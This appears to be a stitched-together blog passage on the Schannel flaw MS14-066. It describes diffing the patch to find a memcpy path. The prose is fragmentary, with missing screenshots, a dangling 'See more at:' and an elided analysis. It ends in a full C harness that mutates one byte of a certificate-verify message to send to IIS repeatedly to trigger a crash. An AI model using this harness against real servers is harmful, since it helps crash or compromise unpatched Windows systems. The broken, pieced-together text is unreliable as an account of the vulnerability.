The Schannel vulnerability MS14-066: details

MS14-066 was patched on November Patch Tuesday (Nov 11, 2014). Here are the details:

Unfortunately for the machines that do not get patched promptly, the Microsoft patch itself lets a reverse engineer diff the old and new binaries, work out what was changed, and then build a proof of concept (POC) against the unpatched code.



We can now see that the added logic controls a path to a memcpy (actually two memcpys — they wouldn’t both fit in the screenshot).  This is an indication that we are looking in the right place. – See more at:

That is what starts the POC work.

…..  more analysis ….


final result:

So all we really need to do is edit s3_clnt.c to randomly change one byte in ‘p’ to a random value before sending our certificate verify message back to IIS over and over again and wait until something cool happens. (i.e. crashing memcpy)
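The single-byte mutation step described in that quote, written out as an added example. This is not code from the quoted post, from OpenSSL, or from the MS14-066 analysis; it is a stand-alone fuzzing primitive you would splice into the client's certificate-verify sending path (assumed here to be `ssl3_send_client_verify()` in s3_clnt.c, right after the signature has been written into `p` and before the record is sent). The PRNG, the helper names and the sample handshake buffer are all constructed for this example; the buffer is not a real captured message.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Small seedable PRNG (xorshift32). A fixed seed makes every fuzz run
 * reproducible, so the exact message that crashed IIS can be replayed.
 * State must be non-zero. */
static uint32_t xorshift32(uint32_t *state)
{
    uint32_t x = *state;
    x ^= x << 13;
    x ^= x >> 17;
    x ^= x << 5;
    return *state = x;
}

/* Change exactly one byte of p[0..len) to a different random value.
 * Returns the mutated index, or -1 when there is nothing to mutate.
 * Hook point (assumption): call this on the CertificateVerify body in
 * s3_clnt.c before the message is handed to the record layer. */
long mutate_one_byte(unsigned char *p, size_t len, uint32_t *state)
{
    if (p == NULL || len == 0)
        return -1;
    size_t idx = xorshift32(state) % len;
    unsigned char old = p[idx], nv;
    do {
        nv = (unsigned char)xorshift32(state);
    } while (nv == old);          /* guarantee a real change */
    p[idx] = nv;
    return (long)idx;
}

/* Number of positions at which two equal-length buffers differ. */
size_t count_diff(const unsigned char *a, const unsigned char *b, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        n += (a[i] != b[i]);
    return n;
}

/* Constructed stand-in for a CertificateVerify handshake body:
 * 4-byte handshake header (type 15, 3-byte length), 2-byte signature
 * length, then 10 bytes of fake signature. Not a real captured message. */
static const unsigned char sample_msg[16] = {
    0x0f, 0x00, 0x00, 0x0c, 0x00, 0x0a,
    0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a
};

/* Mutate a copy of sample_msg from the given seed and return how many
 * bytes changed (expected: exactly 1). */
size_t demo_changed_bytes(uint32_t seed)
{
    unsigned char buf[sizeof sample_msg];
    memcpy(buf, sample_msg, sizeof buf);
    uint32_t st = seed;
    mutate_one_byte(buf, sizeof buf, &st);
    return count_diff(sample_msg, buf, sizeof buf);
}

/* Run the mutation twice from the same seed; 1 if both outputs match. */
int demo_reproducible(uint32_t seed)
{
    unsigned char a[sizeof sample_msg], b[sizeof sample_msg];
    memcpy(a, sample_msg, sizeof a);
    memcpy(b, sample_msg, sizeof b);
    uint32_t s1 = seed, s2 = seed;
    long i1 = mutate_one_byte(a, sizeof a, &s1);
    long i2 = mutate_one_byte(b, sizeof b, &s2);
    return i1 == i2 && memcmp(a, b, sizeof a) == 0;
}

int main(void)
{
    unsigned char buf[sizeof sample_msg];
    uint32_t st = 0x12345678u;
    /* "over and over again": each iteration starts from the clean message */
    for (int round = 0; round < 5; round++) {
        memcpy(buf, sample_msg, sizeof buf);
        long idx = mutate_one_byte(buf, sizeof buf, &st);
        printf("round %d: byte %ld -> 0x%02x\n", round, idx, buf[idx]);
        /* in the real harness: send buf to IIS here and watch for a crash */
    }
    return 0;
}
```

Each round restarts from the clean message so only one byte is ever off; mutating a buffer that is already mutated would quickly turn the test into random noise and make the crashing input harder to attribute. Logging the seed and round number is what lets you rebuild the exact message later.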

